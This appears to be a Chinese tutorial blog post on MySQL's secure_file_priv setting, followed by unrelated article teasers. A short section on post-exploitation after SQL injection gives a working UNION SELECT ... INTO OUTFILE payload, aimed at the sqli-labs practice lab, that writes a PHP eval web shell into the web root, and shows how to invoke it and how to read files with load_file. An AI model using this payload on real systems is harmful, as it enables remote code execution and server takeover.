Mysql 中的secure_file_priv参数设置方法_Mysql

secure_file_priv是mysql中的系统变量，用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(linux版本)中设置。

修改完参数之后，必须重启数据库才能生效。

启动mysql，先查看secure_file_priv的值。

命令：show variables like "secure%" 或 select @@secure_file_priv;

1.secure_file_priv = null ，限制文件的读取和写入。

2.secure_file_priv = 文件路径，限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

【mysql漏洞注入后期】

1. select *** into dumpfile 文件路径；

内容在文件中是以一行的形式呈现，多行数据会出现数据保存不全；

dumpfile只能写一行，并且输出中不存在任何格式。

2.select *** into outfile 文件路径；

内容有特殊格式转换，该换行换行，较比dumpfile更加好用；

outfile可以写入多行数据，并且字段和行终止符都可以作为格式输出。

例如：?id=1')) union select 1,"<?php eval($_request[123]) ?>",3 into outfile "c://phpstudy//www//sqli-labs-master//less-7//test.php" -- +

调用：url/test.php?123=phpinfo();

3.select *** load_file （下载文件）

select load_file(文件路径);

到此这篇关于mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索代码网以前的文章或继续浏览下面的相关文章希望大家以后多多支持代码网！

1、概念在mysql中，当主键为自增长后，这个主键的值就不再需要用户输入数据了，而由数据库系统根据定义自动赋值。每增加一条记录，主键会自动以相同的步长进行增长。注意：自增长约束通常…

2024年11月12日 • 数据库

前言在数据库的日常操作中，将excel数据导入mysql是常见的需求之一，特别是通过navicat工具进行excel数据导入时，可能会遇到数据截断的问题。具体表... [阅读全文]

1、概述在 mysql 中，虚拟列（也称为计算列或生成列）是一种特殊的列，它不存储在数据库表中，而是在查询时动态计算生成。虚拟列可以基于表中的其他列进行计算，或... [阅读全文]

工作中遇到批量更新的场景其实是比较常见的。但是该如何正确的进行批量update，很多时候往往有点头大。这里列2种可用的方式，供选择(请选择方式一，手动狗头。)。... [阅读全文]

0 、前言在写sql语句的时候常常会有很多疑问，那就是当单表的数据量很大的时候，查询性能怎么样，以及索引对数据查询的影响，今天用navicat批量造了很多重复数... [阅读全文]

方法1：对于忘记mysql root用户密码，常规的解决方法是启动的时候加 skip-grant-tables 选项，在绕过密码认证之后，进入mysql数据库系统，以便进行修复或重…

2024年11月12日 • 数据库


验证码：

验证码：

Mysql 中的secure_file_priv参数设置方法